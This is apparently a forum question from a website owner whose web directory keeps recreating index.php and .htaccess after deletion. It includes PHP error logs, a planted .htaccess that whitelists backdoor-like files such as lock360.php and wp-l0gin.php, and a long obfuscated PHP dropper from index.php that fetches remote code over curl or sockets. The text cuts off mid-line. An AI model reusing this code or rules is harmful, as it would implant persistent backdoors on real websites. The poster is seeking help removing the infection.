# Files in my web directory creating automatically after deletion .htaccess and index.php

Tags: php, .htaccess, security, file-permissions, websecurity

I am facing a strange issue today, in my web directory "index.php" and ".htaccess" files are creating automatically, when i delete them they are created automatically again with old file creation datetime see screenshot below:

[image: cpanel screenshot]

in order to figure out whats wrong, i renamed my folder that is infected and getting a log file generated automatically with below log:

lock360.php (I had deleted in advance, because its name was mentioned in htaccess file along with couple of more files.)

```
[16-Jun-2022 15:01:24 UTC] PHP Warning:  file_get_contents(/home/topair/public_html/xyz/index.php): failed to open stream: No such file or directory in /home/mobitair/public_html/xyz/lock360.php on line 157
[16-Jun-2022 15:01:24 UTC] PHP Warning:  file_get_contents(/home/topair/public_html/xyz/.htaccess): failed to open stream: No such file or directory in /home/topair/public_html/xyz/lock360.php on line 158
[16-Jun-2022 15:01:25 UTC] PHP Warning:  file_get_contents(/home/topair/public_html/xyz/index.php): failed to open stream: No such file or directory in /home/topair/public_html/xyz/lock360.php on line 157
[16-Jun-2022 15:01:25 UTC] PHP Warning:  file_get_contents(/home/topair/public_html/xyz/.htaccess): failed to open stream: No such file or directory in /home/topair/public_html/xyz/lock360.php on line 158
[16-Jun-2022 15:01:27 UTC] PHP Warning:  file_get_contents(/home/topair/public_html/xyz/index.php): failed to open stream: No such file or directory in /home/topair/public_html/xyz/lock360.php on line 157
[16-Jun-2022 15:01:27 UTC] PHP Warning:  file_get_contents(/home/topair/public_html/xyz/.htaccess): failed to open stream: No such file or directory in /home/topair/public_html/xyz/lock360.php on line 158
[16-Jun-2022 15:01:28 UTC] PHP Warning:  file_get_contents(/home/topair/public_html/xyz/index.php): failed to open stream: No such file or directory in /home/topair/public_html/xyz/lock360.php on line 157
[16-Jun-2022 15:01:28 UTC] PHP Warning:  file_get_contents(/home/topair/public_html/xyz/.htaccess): failed to open stream: No such file or directory in /home/topair/public_html/xyz/lock360.php on line 158
[16-Jun-2022 15:01:29 UTC] PHP Warning:  file_get_contents(/home/topair/public_html/xyz/index.php): failed to open stream: No such file or directory in /home/topair/public_html/xyz/lock360.php on line 157
[16-Jun-2022 15:01:29 UTC] PHP Warning:  file_get_contents(/home/topair/public_html/xyz/.htaccess): failed to open stream: No such file or directory in /home/topair/public_html/xyz/lock360.php on line 158
[16-Jun-2022 15:01:30 UTC] PHP Warning:  file_get_contents(/home/topair/public_html/xyz/index.php): failed to open stream: No such file or directory in /home/topair/public_html/xyz/lock360.php on line 157
[16-Jun-2022 15:01:30 UTC] PHP Warning:  file_get_contents(/home/topair/public_html/xyz/.htaccess): failed to open stream: No such file or directory in /home/topair/public_html/xyz/lock360.php on line 158
[16-Jun-2022 15:01:31 UTC] PHP Warning:  file_get_contents(/home/topair/public_html/xyz/index.php): failed to open stream: No such file or directory in /home/topair/public_html/xyz/lock360.php on line 157
[16-Jun-2022 15:01:31 UTC] PHP Warning:  file_get_contents(/home/topair/public_html/xyz/.htaccess): failed to open stream: No such file or directory in /home/topair/public_html/xyz/lock360.php on line 158
[16-Jun-2022 15:01:32 UTC] PHP Warning:  file_get_contents(/home/topair/public_html/xyz/index.php): failed to open stream: No such file or directory in /home/topair/public_html/xyz/lock360.php on line 157
[16-Jun-2022 15:01:32 UTC] PHP Warning:  file_get_contents(/home/topair/public_html/xyz/.htaccess): failed to open stream: No such file or directory in /home/topair/public_html/xyz/lock360.php on line 158
[16-Jun-2022 15:01:33 UTC] PHP Warning:  file_get_contents(/home/topair/public_html/xyz/index.php): failed to open stream: No such file or directory in /home/topair/public_html/xyz/lock360.php on line 157
[16-Jun-2022 15:01:33 UTC] PHP Warning:  file_get_contents(/home/topair/public_html/xyz/.htaccess): failed to open stream: No such file or directory in /home/topair/public_html/xyz/lock360.php on line 158
[16-Jun-2022 15:01:34 UTC] PHP Warning:  file_get_contents(/home/topair/public_html/xyz/index.php): failed to open stream: No such file or directory in /home/topair/public_html/xyz/lock360.php on line 157
[16-Jun-2022 15:01:34 UTC] PHP Warning:  file_get_contents(/home/topair/public_html/xyz/.htaccess): failed to open stream: No such file or directory in /home/topair/public_html/xyz/lock360.php on line 158
[16-Jun-2022 15:01:35 UTC] PHP Warning:  file_get_contents(/home/topair/public_html/xyz/index.php): failed to open stream: No such file or directory in /home/topair/public_html/xyz/lock360.php on line 157
[16-Jun-2022 15:01:35 UTC] PHP Warning:  file_get_contents(/home/topair/public_html/xyz/.htaccess): failed to open stream: No such file or directory in /home/topair/public_html/xyz/lock360.php on line 158
[16-Jun-2022 15:01:36 UTC] PHP Warning:  file_get_contents(/home/topair/public_html/xyz/index.php): failed to open stream: No such file or directory in /home/topair/public_html/xyz/lock360.php on line 157
```

**code of Htaccess: (i cannot modify,delete or change this file)**

```
<FilesMatch ".(py|exe|php)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "^(index.php|lock360.php|wp-l0gin.php|wp-the1me.php|wp-scr1pts.php|wp-admin.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
```

**suspecious line added at the top of index.php (i cannot modify,delete or change this file)**

```
<?php
$xzyyzyz___=urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%57%43%61%39%33%56%6b%30%77%4d%31%4f%65%53%44%64%42%32%6a%2f%6c%73%58%66%71%70%68%6d%2a%54%47%76%51%48%72%50%79%63%5c%34%7a%75%46%36%69%5a%67%38%45");$xz__y_yyzz=$xzyyzyz___[44].$xzyyzyz___[53].$xzyyzyz___[31].$xzyyzyz___[65].$xzyyzyz___[10].$xzyyzyz___[53].$xzyyzyz___[31].$xzyyzyz___[44].$xzyyzyz___[39].$xzyyzyz___[21].$xzyyzyz___[56].$xzyyzyz___[31].$xzyyzyz___[10].$xzyyzyz___[56].$xzyyzyz___[21].$xzyyzyz___[39].$xzyyzyz___[39].$xzyyzyz___[3].$xzyyzyz___[21].$xzyyzyz___[56].$xzyyzyz___[25];$xyzzz_y_y_=$xzyyzyz___[40].$xzyyzyz___[13].$xzyyzyz___[53].$xzyyzyz___[31].$xzyyzyz___[21].$xzyyzyz___[46].$xzyyzyz___[10].$xzyyzyz___[40].$xzyyzyz___[0].$xzyyzyz___[56].$xzyyzyz___[25].$xzyyzyz___[31].$xzyyzyz___[13].$xzyyzyz___[10].$xzyyzyz___[56].$xzyyzyz___[39].$xzyyzyz___[63].$xzyyzyz___[31].$xzyyzyz___[5].$xzyyzyz___[13];$xy_yzy__zz=$xzyyzyz___[40].$xzyyzyz___[13].$xzyyzyz___[53].$xzyyzyz___[31].$xzyyzyz___[21].$xzyyzyz___[46].$xzyyzyz___[10].$xzyyzyz___[65].$xzyyzyz___[31].$xzyyzyz___[13].$xzyyzyz___[10].$xzyyzyz___[46].$xzyyzyz___[31].$xzyyzyz___[13].$xzyyzyz___[21].$xzyyzyz___[10].$xzyyzyz___[34].$xzyyzyz___[21].$xzyyzyz___[13].$xzyyzyz___[21];$x_z_yyyz_z=$xzyyzyz___[40].$xzyyzyz___[13].$xzyyzyz___[53].$xzyyzyz___[31].$xzyyzyz___[21].$xzyyzyz___[46].$xzyyzyz___[10].$xzyyzyz___[40].$xzyyzyz___[31].$xzyyzyz___[13].$xzyyzyz___[10].$xzyyzyz___[3].$xzyyzyz___[39].$xzyyzyz___[0].$xzyyzyz___[56].$xzyyzyz___[25].$xzyyzyz___[63].$xzyyzyz___[5].$xzyyzyz___[65];$x_yzy_yz_z=$xzyyzyz___[40].$xzyyzyz___[13].$xzyyzyz___[53].$xzyyzyz___[31].$xzyyzyz___[21].$xzyyzyz___[46].$xzyyzyz___[10].$xzyyzyz___[40].$xzyyzyz___[31].$xzyyzyz___[13].$xzyyzyz___[10].$xzyyzyz___[13].$xzyyzyz___[63].$xzyyzyz___[46].$xzyyzyz___[31].$xzyyzyz___[0].$xzyyzyz___[60].$xzyyzyz___[13];$xyy_yzzz__=$xzyyzyz___[42].$xzyyzyz___[60].$xzyyzyz___[5].$xzyyzyz___[56].$xzyyzyz___[13].$xzyyzyz___[63].$xzyyzyz___[0].$xzyyzyz___[5].$xzyyzyz___[10].$xzyyzyz___[31].$xzyyzyz___[15].$xzyyzyz___[63].$xzyyzyz___[40].$xzyyzyz___[13].$xzyyzyz___[40];$x__z_yzyyz=$xzyyzyz___[31].$xzyyzyz___[53].$xzyyzyz___[53].$xzyyzyz___[0].$xzyyzyz___[53].$xzyyzyz___[10].$xzyyzyz___[53].$xzyyzyz___[31].$xzyyzyz___[44].$xzyyzyz___[0].$xzyyzyz___[53].$xzyyzyz___[13].$xzyyzyz___[63].$xzyyzyz___[5].$xzyyzyz___[65];$x_yyzz_zy_=$xzyyzyz___[65].$xzyyzyz___[31].$xzyyzyz___[13].$xzyyzyz___[45].$xzyyzyz___[0].$xzyyzyz___[40].$xzyyzyz___[13].$xzyyzyz___[3].$xzyyzyz___[55].$xzyyzyz___[5].$xzyyzyz___[21].$xzyyzyz___[46].$xzyyzyz___[31];$x__yzzzy_y=$xzyyzyz___[3].$xzyyzyz___[21].$xzyyzyz___[40].$xzyyzyz___[31].$xzyyzyz___[62].$xzyyzyz___[58].$xzyyzyz___[10].$xzyyzyz___[31].$xzyyzyz___[5].$xzyyzyz___[56].$xzyyzyz___[0].$xzyyzyz___[34].$xzyyzyz___[31];$xzy_y_zy_z=$xzyyzyz___[3].$xzyyzyz___[21].$xzyyzyz___[40].$xzyyzyz___[31].$xzyyzyz___[62].$xzyyzyz___[58].$xzyyzyz___[10].$xzyyzyz___[34].$xzyyzyz___[31].$xzyyzyz___[56].$xzyyzyz___[0].$xzyyzyz___[34].$xzyyzyz___[31];$xz_yyz__zy=$xzyyzyz___[53].$xzyyzyz___[21].$xzyyzyz___[27].$xzyyzyz___[60].$xzyyzyz___[53].$xzyyzyz___[39].$xzyyzyz___[31].$xzyyzyz___[5].$xzyyzyz___[56].$xzyyzyz___[0].$xzyyzyz___[34].$xzyyzyz___[31];$xz_y__zyzy=$xzyyzyz___[40].$xzyyzyz___[13].$xzyyzyz___[53].$xzyyzyz___[10].$xzyyzyz___[53].$xzyyzyz___[31].$xzyyzyz___[44].$xzyyzyz___[39].$xzyyzyz___[21].$xzyyzyz___[56].$xzyyzyz___[31];$xyyzz_z__y=$xzyyzyz___[56].$xzyyzyz___[60].$xzyyzyz___[53].$xzyyzyz___[39].$xzyyzyz___[10].$xzyyzyz___[40].$xzyyzyz___[31].$xzyyzyz___[13].$xzyyzyz___[0].$xzyyzyz___[44].$xzyyzyz___[13];$x__yzyz_yz=$xzyyzyz___[21].$xzyyzyz___[53].$xzyyzyz___[53].$xzyyzyz___[21].$xzyyzyz___[55].$xzyyzyz___[10].$xzyyzyz___[40].$xzyyzyz___[45].$xzyyzyz___[63].$xzyyzyz___[42].$xzyyzyz___[13];$xzy__z_yyz=$xzyyzyz___[44].$xzyyzyz___[53].$xzyyzyz___[31].$xzyyzyz___[65].$xzyyzyz___[10].$xzyyzyz___[40].$xzyyzyz___[44].$xzyyzyz___[39].$xzyyzyz___[63].$xzyyzyz___[13];$xz__yz_yyz=$xzyyzyz___[44].$xzyyzyz___[53].$xzyyzyz___[31].$xzyyzyz___[65].$xzyyzyz___[10].$xzyyzyz___[46].$xzyyzyz___[21].$xzyyzyz___[13].$xzyyzyz___[56].$xzyyzyz___[45];$xzyyyz___z=$xzyyzyz___[56].$xzyyzyz___[60].$xzyyzyz___[53].$xzyyzyz___[39].$xzyyzyz___[10].$xzyyzyz___[56].$xzyyzyz___[39].$xzyyzyz___[0].$xzyyzyz___[40].$xzyyzyz___[31];$xy_y_zzyz_=$xzyyzyz___[40].$xzyyzyz___[13].$xzyyzyz___[53].$xzyyzyz___[10].$xzyyzyz___[40].$xzyyzyz___[44].$xzyyzyz___[39].$xzyyzyz___[63].$xzyyzyz___[13];$x_zyzy__yz=$xzyyzyz___[44].$xzyyzyz___[21].$xzyyzyz___[53].$xzyyzyz___[40].$xzyyzyz___[31].$xzyyzyz___[10].$xzyyzyz___[60].$xzyyzyz___[53].$xzyyzyz___[39];$xyzz__zy_y=$xzyyzyz___[65].$xzyyzyz___[59].$xzyyzyz___[63].$xzyyzyz___[5].$xzyyzyz___[42].$xzyyzyz___[39].$xzyyzyz___[21].$xzyyzyz___[13].$xzyyzyz___[31];$x__yzzy_zy=$xzyyzyz___[56].$xzyyzyz___[60].$xzyyzyz___[53].$xzyyzyz___[39].$xzyyzyz___[10].$xzyyzyz___[63].$xzyyzyz___[5].$xzyyzyz___[63].$xzyyzyz___[13];$x__yyy_zzz=$xzyyzyz___[56].$xzyyzyz___[60].$xzyyzyz___[53].$xzyyzyz___[39].$xzyyzyz___[10].$xzyyzyz___[31].$xzyyzyz___[15].$xzyyzyz___[31].$xzyyzyz___[56];$x_zzz__yyy=$xzyyzyz___[50].$xzyyzyz___[21].$xzyyzyz___[53].$xzyyzyz___[10].$xzyyzyz___[34].$xzyyzyz___[60].$xzyyzyz___[46].$xzyyzyz___[44];$xy__zzzyy_=$xzyyzyz___[63].$xzyyzyz___[40].$xzyyzyz___[10].$xzyyzyz___[21].$xzyyzyz___[53].$xzyyzyz___[53].$xzyyzyz___[21].$xzyyzyz___[55];$xyzz_z_y_y=$xzyyzyz___[13].$xzyyzyz___[46].$xzyyzyz___[44].$xzyyzyz___[42].$xzyyzyz___[63].$xzyyzyz___[39].$xzyyzyz___[31];$xyz_zy__zy=$xzyyzyz___[44].$xzyyzyz___[53].$xzyyzyz___[63].$xzyyzyz___[5].$xzyyzyz___[13].$xzyyzyz___[10].$xzyyzyz___[53];$xzy_z_zy_y=$xzyyzyz___[63].$xzyyzyz___[46].$xzyyzyz___[44].$xzyyzyz___[39].$xzyyzyz___[0].$xzyyzyz___[34].$xzyyzyz___[31];$xy_z_zzyy_=$xzyyzyz___[31].$xzyyzyz___[15].$xzyyzyz___[44].$xzyyzyz___[39].$xzyyzyz___[0].$xzyyzyz___[34].$xzyyzyz___[31];$xyyzz_z_y_=$xzyyzyz___[40].$xzyyzyz___[13].$xzyyzyz___[53].$xzyyzyz___[44].$xzyyzyz___[0].$xzyyzyz___[40];$x_yy_yz_zz=$xzyyzyz___[40].$xzyyzyz___[13].$xzyyzyz___[53].$xzyyzyz___[39].$xzyyzyz___[31].$xzyyzyz___[5];$x_yyzz__zy=$xzyyzyz___[45].$xzyyzyz___[31].$xzyyzyz___[15].$xzyyzyz___[34].$xzyyzyz___[31].$xzyyzyz___[56];$xzzy_zy__y=$xzyyzyz___[42].$xzyyzyz___[27].$xzyyzyz___[53].$xzyyzyz___[63].$xzyyzyz___[13].$xzyyzyz___[31];$x_z_yyzzy_=$xzyyzyz___[42].$xzyyzyz___[56].$xzyyzyz___[39].$xzyyzyz___[0].$xzyyzyz___[40].$xzyyzyz___[31];$xz_zyyz_y_=$xzyyzyz___[42].$xzyyzyz___[53].$xzyyzyz___[31].$xzyyzyz___[21].$xzyyzyz___[34];$x_zzyzy_y_=$xzyyzyz___[42].$xzyyzyz___[65].$xzyyzyz___[31].$xzyyzyz___[13].$xzyyzyz___[40];$xz_z_zyyy_=$xzyyzyz___[56].$xzyyzyz___[0].$xzyyzyz___[60].$xzyyzyz___[5].$xzyyzyz___[13];$xzyz_yyz__=$xzyyzyz___[13].$xzyyzyz___[53].$xzyyzyz___[63].$xzyyzyz___[46];$x_zyyz_yz_=$xzyyzyz___[37].$xzyyzyz___[0].$xzyyzyz___[63].$xzyyzyz___[5];$xzzy_yz_y_=$xzyyzyz___[42].$xzyyzyz___[31].$xzyyzyz___[0].$xzyyzyz___[42];${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x5f\x5f\x7a\x5f\x79\x7a\x79\x79\x7a"](0);$xzyyy_z_z_="Ha0RDcvo3LhR2cftTMwEXLxYDMuEGbl9WZzxSYj52b0v";$xz_y__zzyy="Ha0RHc6MyLj9mLrpjduI2Yt9wL==";function x_yyyzz_z_($xy_zz_zyy_){$x_yzy_y_zz=substr($xy_zz_zyy_,0,5);$xzzyy__zy_=substr($xy_zz_zyy_,-5);$xzy_yzzy__=substr($xy_zz_zyy_,7,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x5f\x79\x79\x5f\x79\x7a\x5f\x7a\x7a"]($xy_zz_zyy_)-14);return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x79\x7a\x7a\x5f\x5f\x7a\x79\x5f\x79"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x7a\x79\x5f\x79\x5f\x7a\x79\x5f\x7a"]($x_yzy_y_zz.$xzy_yzzy__.$xzzyy__zy_));}function xy_y__zzyz($xzz_yz_yy_){if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x7a\x5f\x5f\x79\x7a\x5f\x79\x79\x7a"]("/^https*\\:\\/\\//si",$xzz_yz_yy_)){return '500';}$xyy_zyz_z_=x_yyyzz_z_('Sy4tyHOonPzMss0U4GsYpTS/ILoOzUitTkmrTi/OTs/ILUvJoCBLO4pCg1MTcexE8tiU/OyUzNK6mB8YBSXSJakA');$x___yyzyzz=$xz_zzyy_y_=$xy__yzzzy_=$err_str ='';foreach(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x79\x5f\x7a\x5f\x7a\x7a\x79\x79\x5f"]('|',$xyy_zyz_z_) as $c){$xyzy_z_yz_=1;foreach(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x79\x5f\x7a\x5f\x7a\x7a\x79\x79\x5f"]('+',$c) as $d){if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x79\x79\x5f\x79\x7a\x7a\x7a\x5f\x5f"]($d)){$xyzy_z_yz_=0;}}unset($d);if($xyzy_z_yz_){$x___yyzyzz=$c;break;}}unset($xyy_zyz_z_,$c);if($x___yyzyzz==''){return 0;}if(substr($x___yyzyzz,0,1)=='c'){$xz_yyyz_z_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x5f\x5f\x79\x7a\x7a\x79\x5f\x7a\x79"]();${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x79\x79\x7a\x7a\x5f\x7a\x5f\x5f\x79"]($xz_yyyz_z_,CURLOPT_URL,$xzz_yz_yy_);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x79\x79\x7a\x7a\x5f\x7a\x5f\x5f\x79"]($xz_yyyz_z_,CURLOPT_USERAGENT,'s');${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x79\x79\x7a\x7a\x5f\x7a\x5f\x5f\x79"]($xz_yyyz_z_,CURLOPT_RETURNTRANSFER,1);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x79\x79\x7a\x7a\x5f\x7a\x5f\x5f\x79"]($xz_yyyz_z_,CURLOPT_TIMEOUT,100);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x79\x79\x7a\x7a\x5f\x7a\x5f\x5f\x79"]($xz_yyyz_z_,CURLOPT_FRESH_CONNECT,TRUE);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x79\x79\x7a\x7a\x5f\x7a\x5f\x5f\x79"]($xz_yyyz_z_,CURLOPT_SSL_VERIFYPEER,0);$x_yz_yyz_z=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x5f\x5f\x79\x79\x79\x5f\x7a\x7a\x7a"]($xz_yyyz_z_);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x7a\x79\x79\x79\x7a\x5f\x5f\x5f\x7a"]($xz_yyyz_z_);if(!$x_yz_yyz_z){return '501';}else{return $x_yz_yyz_z;}}$x_yz__zzyy=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x5f\x7a\x79\x7a\x79\x5f\x5f\x79\x7a"]($xzz_yz_yy_);isset($x_yz__zzyy["\x68\x6f\x73\x74"])||$x_yz__zzyy["\x68\x6f\x73\x74"]='';isset($x_yz__zzyy["\x70\x61\x74\x68"])||$x_yz__zzyy["\x70\x61\x74\x68"]='';isset($x_yz__zzyy["\x71\x75\x65\x72\x79"])|| $x_yz__zzyy["\x71\x75\x65\x72\x79"]='';isset($x_yz__zzyy["\x70\x6f\x72\x74"])||$x_yz__zzyy["\x70\x6f\x72\x74"]='';$x_zzy__yzy=$x_yz__zzyy["\x70\x61\x74\x68"]?$x_yz__zzyy["\x70\x61\x74\x68"].($x_yz__zzyy["\x71\x75\x65\x72\x79"]?'?'.$x_yz__zzyy["\x71\x75\x65\x72\x79"]:''):'/';$xyzyzz__y_=$x_yz__zzyy["\x68\x6f\x73\x74"];if($x_yz__zzyy["\x73\x63\x68\x65\x6d\x65"]=='https'){$x_yz_zy_zy='1.1';$xy_zz_z_yy=empty($x_yz__zzyy["\x70\x6f\x72\x74"])?443:$x_yz__zzyy["\x70\x6f\x72\x74"];$xyzyzz__y_=x_yyyzz_z_('Ky7OsPKdLxoXBwA=');$xyzyzz__y_.=$x_yz__zzyy["\x68\x6f\x73\x74"];}else{$x_yz_zy_zy='1.0';$xy_zz_z_yy=empty($x_yz__zzyy["\x70\x6f\x72\x74"])?80:$x_yz__zzyy["\x70\x6f\x72\x74"];}$xy__zy_zzy='Host:';$xy__zy_zzy.=$xyzyzz__y_;$headers[]=$xy__zy_zzy;$headers[]=x_yyyzz_z_('c87PykU0tNLsnMz7NyzskNTvTgUA');$headers[]=x_yyyzz_z_('Cy1OLjUdJ1TE/NK7EyhqBgA=');$headers[]=x_yyyzz_z_('c0xOTxji0osdLcvS1wIA');unset($xy__zy_zzy);$xz_zzyy_y_="GET $x_zzy__yzy HTTP/$x_yz_zy_zy".PHP_EOL.${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x5f\x7a\x79\x79\x7a\x5f\x79\x7a\x5f"](PHP_EOL,$headers).PHP_EOL.PHP_EOL;unset($headers,$x_yz__zzyy,$x_yz_zy_zy,$x_zzy__yzy);$x__zyyy_zz=null;if(substr($x___yyzyzz,-1)=='n'){$x__zyyy_zz=$x___yyzyzz($xyzyzz__y_,$xy_zz_z_yy,$xy__yzzzy_,$err_str,30);}else{if(substr($x___yyzyzz,-1)=='t'){$x__yzzzyy_=x_yyyzz_z_('K0kusujNLphXBwA=');$x__yzzzyy_.=$xyzyzz__y_;$x__yzzzyy_.=':';$x__yzzzyy_.=$xy_zz_z_yy;$x__zyyy_zz=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x79\x7a\x7a\x7a\x5f\x79\x5f\x79\x5f"]($x__yzzzyy_,$xy__yzzzy_,$err_str,30);unset($x__yzzzyy_);}}$xzy_z_yyz_='';if($x__zyyy_zz){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x5f\x7a\x5f\x79\x79\x79\x7a\x5f\x7a"]($x__zyyy_zz,TRUE);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x5f\x79\x7a\x79\x5f\x79\x7a\x5f\x7a"]($x__zyyy_zz,30);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x7a\x7a\x79\x5f\x7a\x79\x5f\x5f\x79"]($x__zyyy_zz,$xz_zzyy_y_);$xzy_zzy_y_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x79\x5f\x79\x7a\x79\x5f\x5f\x7a\x7a"]($x__zyyy_zz);if(!$xzy_zzy_y_["\x74\x69\x6d\x65\x64\x5f\x6f\x75\x74"]){while(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x7a\x7a\x79\x5f\x79\x7a\x5f\x79\x5f"]($x__zyyy_zz)){$xyyy__z_zz=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x5f\x7a\x7a\x79\x7a\x79\x5f\x79\x5f"]($x__zyyy_zz);if($xyyy__z_zz&&(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x7a\x5f\x79\x79\x7a\x5f\x5f\x7a\x79"]($xyyy__z_zz)=="%0D%0A"||${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x7a\x5f\x79\x79\x7a\x5f\x5f\x7a\x79"]($xyyy__z_zz)=="%0A")){break;}unset($xyyy__z_zz);}while(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x7a\x7a\x79\x5f\x79\x7a\x5f\x79\x5f"]($x__zyyy_zz)){$x_zyyz_y_z=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x7a\x5f\x7a\x79\x79\x7a\x5f\x79\x5f"]($x__zyyy_zz,8192);$xzy_z_yyz_.=$x_zyyz_y_z;unset($x_zyyz_y_z);}}unset($xzy_zzy_y_);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x5f\x7a\x5f\x79\x79\x7a\x7a\x79\x5f"]($x__zyyy_zz);}else{if(substr($x___yyzyzz,-1)=='e'){$xy_z_y_zyz=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x5f\x79\x79\x7a\x7a\x5f\x7a\x79\x5f"]($xyzyzz__y_);$x__zyyy_zz=$x___yyzyzz(AF_INET,SOCK_STREAM,0);if(socket_connect($x__zyyy_zz,$xy_z_y_zyz,$xy_zz_z_yy)){socket_write($x__zyyy_zz,$xz_zzyy_y_,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x5f\x79\x79\x5f\x79\x7a\x5f\x7a\x7a"]($xz_zzyy_y_));while($xyyz_y_z_z=@socket_read($x__zyyy_zz,8192)){$xzy_z_yyz_.=$xyyz_y_z_z;unset($xyyz_y_z_z);}$xzy_z_yyz_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x79\x5f\x7a\x5f\x7a\x7a\x79\x79\x5f"]("\\r\\n\\r\\n",$xzy_z_yyz_);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x5f\x5f\x79\x7a\x79\x7a\x5f\x79\x7a"]($xzy_z_yyz_);$xzy_z_yyz_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x7a\x79\x5f\x7a\x5f\x7a\x79\x5f\x79"]("\\r\\n\\r\\n",$xzy_z_yyz_);}socket_close($x__zyyy_zz);unset($xy_z_y_zyz);}}unset($xz_zzyy_y_,$x___yyzyzz,$x__zyyy_zz,$xy_zz_z_yy,$xyzyzz__y_);$xzy_z_yyz_=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x7a\x5f\x5f\x79\x5f\x79\x79\x7a\x7a"]('/(?:(?:\\r\\n|\\n)|^)([0-9A-F]+)(?:\\r\\n|\\n){1,2}(.*?)'.'((?:\\r\\n|\\n)(?:[0-9A-F]+(?:\\r\\n|\\n))|$)/si','xyzyyzz___',$xzy_z_yyz_);return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x7a\x79\x7a\x5f\x79\x79\x7a\x5f\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x7a\x79\x7a\x5f\x79\x79\x7a\x5f\x5f"]($xzy_z_yyz_,"\\xEF\\xBB\\xBF"));}function xyzyyzz___($matches){return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x5f\x79\x79\x7a\x7a\x5f\x5f\x7a\x79"]($matches[1])==${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x5f\x79\x79\x5f\x79\x7a\x5f\x7a\x7a"]($matches[2])?$matches[2]:$matches[0];}function xz__y_yzyz($xyzzyyz___=''){$xyzzyyz___=(${"\x5f\x53\x45\x52\x56\x45\x52"}["HTTP_VIA"])?${"\x5f\x53\x45\x52\x56\x45\x52"}["HTTP_X_FORWARDED_FOR"]:${"\x5f\x53\x45\x52\x56\x45\x52"}["REMOTE_ADDR"];$xyzzyyz___=($xyzzyyz___)?$xyzzyyz___:${"\x5f\x53\x45\x52\x56\x45\x52"}["REMOTE_ADDR"];return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x7a\x79\x7a\x5f\x79\x79\x7a\x5f\x5f"]($xyzzyyz___);}function x_y_zyz_zy($xy_zz_zyy_=''){if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"])){return ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"];}elseif(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"])){return ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"];}return $xy_zz_zyy_;}function x_y_zy_zzy($xzz_yz_yy_){$xyy_zz__yz=xy_y__zzyz($xzz_yz_yy_);$xzzy_yy_z_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x7a\x79\x5f\x79\x5f\x7a\x79\x5f\x7a"]("PD9waHA=");if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x79\x79\x7a\x7a\x5f\x7a\x5f\x79\x5f"]($xyy_zz__yz,$xzzy_yy_z_)===false){die('get 